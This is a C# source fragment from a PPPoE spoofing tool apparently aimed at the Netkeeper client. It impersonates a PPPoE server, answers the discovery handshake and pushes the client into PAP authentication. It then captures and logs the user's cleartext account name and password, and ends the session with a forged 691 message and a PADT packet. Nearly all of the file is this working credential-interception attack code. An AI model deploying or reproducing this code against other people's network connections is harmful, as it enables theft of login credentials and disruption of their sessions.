//获取数据title为Host-Uniq(主机唯一标识)
public byte[] getData_HostUniq(byte[] pac)
{
try
{
byte[] hostUniqToString = sup.toByte(new String[] { "01", "01", "00", "00", "01", "03" });
int loca = sup.byteIndexOf(pac, hostUniqToString);
if (loca == -1)
{
return(null);
}
byte[] hostUniqLengthByte = sup.byteSub(pac, loca + hostUniqToString.Length, 2);
int hostUniqLength = hostUniqLengthByte[0] * 256 + hostUniqLengthByte[1];
return(sup.byteSub(pac, loca + hostUniqToString.Length + 2, hostUniqLength));
}
catch
{
Console.WriteLine("getData_HostUniq() : 未知错误");
return(null);
}
}
//获取PPP_Data块数据为用户自定义的8864包
public byte[] getAllPacketData_custom()
{
if (distinationMac == null || sourceMac == null || sessionID == null || PPP_allData == null)
{
Console.WriteLine("需要构造的自定义PPP_X的数据包的参数还没有赋值完");
return(null);
}
sortPayloadAnInfo(); //将List<byte[]> 排序 (顺便把排序完成的东西赋值到PPPLCP_optionsData数组)
byte[] append1 = sup.byteAppent(distinationMac, sourceMac);
versions = sup.toByte(new string[] { "11" }); //自动填充pppoe版本为0x11
packetType = sup.toByte(new string[] { "88", "64" }); //自动设置包协议
byte[] append2 = sup.byteAppent(packetType, versions);
sessionData = sup.toByte(new string[] { "00" }); //自动设置sessionData
byte[] append3 = sup.byteAppent(sessionData, sessionID);
int payloadLength_i = PPP_allData.Length;
payloadLength = new byte[2];
payloadLength[0] = (byte)(payloadLength_i / 256);
payloadLength[1] = (byte)(payloadLength_i % 256);
byte[] append4 = sup.byteAppent(payloadLength, PPP_allData);
byte[] append5 = sup.byteAppent(append1, append2);
byte[] append6 = sup.byteAppent(append3, append4);
return(sup.byteAppent(append5, append6));
}
//catchPacketFun()的处理函数
//处理方式是pppoe欺骗
//note(maybe): packet对象是被抓获的包(单包)
private void device_OnPacketArrival(object sender, CaptureEventArgs packet)
{
if (packet.Packet.Data[12] == 136)
{
if (packet.Packet.Data[13] == 99) //过滤非pppoe包,是 8863 包时
{
byte[] pac = packet.Packet.Data;
protocol8863 p8863 = new protocol8863();
support sup = new support();
switch (p8863.getDiscoveryStage(pac)[0])
{
//PADI 0x09
case 9:
p8863.setDistinationMac(sup.getSourceMac(pac));
p8863.setSourceMac(selfMac);
p8863.setDiscoveryStage(new byte[] { 7 });
p8863.setSessionID(p8863.getSessionID(pac));
p8863.setData_HostUniq(p8863.getData_HostUniq(pac));
p8863.setData_other(sup.toByte(new string[] { "01", "02", "00", "08", "50", "50", "50", "4f", "45", "53", "52", "56" })); //PPPOESRV
sendPacket(p8863.getAllPacketData());
log.writeLog("正在进行PPPOE协议交互...", log.msgType.info);
return;
//PADR 0x19
case 25:
p8863.setDistinationMac(sup.getSourceMac(pac));
p8863.setSourceMac(selfMac);
p8863.setDiscoveryStage(new byte[] { 101 });
byte[] sessionID = p8863.getSessionID(pac);
sessionID[1]++;
p8863.setSessionID(sessionID);
p8863.setData_HostUniq(p8863.getData_HostUniq(pac));
sendPacket(p8863.getAllPacketData());
return;
}
}
if (packet.Packet.Data[13] == 100) //过滤非pppoe包,是 8864 包时
{
byte[] pac = packet.Packet.Data;
protocol8864 p8864 = new protocol8864();
support sup = new support();
if (p8864.getPPP(pac)[0] == 192 && p8864.getPPP(pac)[1] == 35) //如果PPP为PAP
{
#region //目前的方式,使用 691 Message 终结连接
if (pac[22] == (byte)1) //如果是PAP request包
{
//Console.WriteLine("终结包(691 message packet)已发送");
byte[] papContent = p8864.getPPPLCP_optionsData(pac); //获取PAP内容
byte[] papNetAcc = sup.byteSub(papContent, 1, papContent[0]);
byte[] papNetPwd = sup.byteSub(papContent, papContent[0] + 2, papContent[papContent[0] + 1]);
log.writeLog($"PPPOE 欺骗模块\n截取到账号: {Encoding.Default.GetString(papNetAcc)}\n截取到密码:{Encoding.Default.GetString(papNetPwd)}", log.msgType.info);
netAcc = Encoding.Default.GetString(papNetAcc); //将截取到的 账号 赋值到类变量
netPwd = Encoding.Default.GetString(papNetPwd); //将截取到的 密码 赋值到类变量
colseNetAdapte = true; //停止抓包
//691 Msg
String msg691 = "\r\n拦截成功,这并非错误提示。\r\n\r\n你现在可以关闭Netkeeper\r\n\r\n并注意nkshare的提示##Error";
byte[] msg691Bytes = Encoding.GetEncoding("GB2312").GetBytes(msg691);
protocol8864 p8864Show = new protocol8864();
p8864Show.setDistinationMac(sup.getSourceMac(pac));
p8864Show.setSourceMac(selfMac);
p8864Show.setSessionID(p8864Show.getSessionID(pac));
byte[] msg691BytesPac = sup.byteAppent(new byte[] { (byte)msg691Bytes.Length }, msg691Bytes);
byte[] papCodeBytesPac = sup.byteAppent(new byte[] { 192, 35, 3, ++pac[23] }, new byte[] { (byte)((msg691BytesPac.Length + 4) / 256), (byte)((msg691BytesPac.Length + 4) % 256) });
byte[] papAll = sup.byteAppent(papCodeBytesPac, msg691BytesPac);
p8864Show.setPPP_allData(papAll);
sendPacket(p8864Show.getAllPacketData_custom());
//691 Msg
protocol8863 p8863 = new protocol8863();
p8863.setDistinationMac(sup.getSourceMac(pac));
p8863.setSourceMac(sup.getDistinationMac(pac));
p8863.setDiscoveryStage(new byte[] { 167 }); //PADT 终结包
p8863.setSessionID(p8863.getSessionID(pac));
p8863.setData_other(null);
sendPacket(p8863.getAllPacketData());
return;
}
#endregion
#region //原来直接方式终结包
//protocol8863 p8863 = new protocol8863();
//p8863.setDistinationMac(sup.getSourceMac(pac));
//p8863.setSourceMac(sup.getDistinationMac(pac));
//p8863.setDiscoveryStage(new byte[] { 167 }); //PADT 终结包
//p8863.setSessionID(p8863.getSessionID(pac));
//p8863.setData_other(null);
//sendPacket(p8863.getAllPacketData());
//Console.WriteLine("终结包已发送");
//byte[] papContent = p8864.getPPPLCP_optionsData(pac); //获取PAP内容
//byte[] papNetAcc = sup.byteSub(papContent, 1, papContent[0]);
//byte[] papNetPwd = sup.byteSub(papContent, papContent[0] + 2, papContent[papContent[0] + 1]);
//log.writeLog($"PPPOE 欺骗模块\n截取到账号: {Encoding.Default.GetString(papNetAcc)}\n截取到密码:{Encoding.Default.GetString(papNetPwd)}",log.msgType.info);
//netAcc = Encoding.Default.GetString(papNetAcc); //将截取到的 账号 赋值到类变量
//netPwd = Encoding.Default.GetString(papNetPwd); //将截取到的 密码 赋值到类变量
//colseNetAdapte = true; //停止抓包
#endregion
}
if (sup.equalsByte(sup.getDistinationMac(pac), selfMac) && p8864.getPPPLCP_config(pac)[0] == 1) //如果是客户机Requuest本机(PPP-LCP/虽然没加上这个默认条件)
{
p8864.setDistinationMac(sup.getSourceMac(pac));
p8864.setSourceMac(selfMac);
p8864.setSessionID(p8864.getSessionID(pac));
p8864.setPPP(p8864.getPPP(pac));
p8864.setPPPLCP_config(new byte[] { 2 }); //ACK
p8864.setPPPLCP_identifier(p8864.getPPPLCP_identifier(pac));
byte[] optionDataModif = p8864.getPPPLCP_optionsData(pac);
p8864.setPPPLCP_optionsData(optionDataModif); //轻冗余
sendPacket(p8864.getAllPacketData_PPPLCP());
p8864 = new protocol8864();
p8864.setDistinationMac(sup.getSourceMac(pac));
p8864.setSourceMac(selfMac);
p8864.setSessionID(p8864.getSessionID(pac));
p8864.setPPP(p8864.getPPP(pac));
p8864.setPPPLCP_config(new byte[] { 1 }); //Req
p8864.setPPPLCP_identifier(new byte[] { 1 });
p8864.setPPPLCP_optionsData(sup.toByte(new string[] { "03", "04", "c0", "23", }));
sendPacket(p8864.getAllPacketData_PPPLCP());
return;
}
}
}
}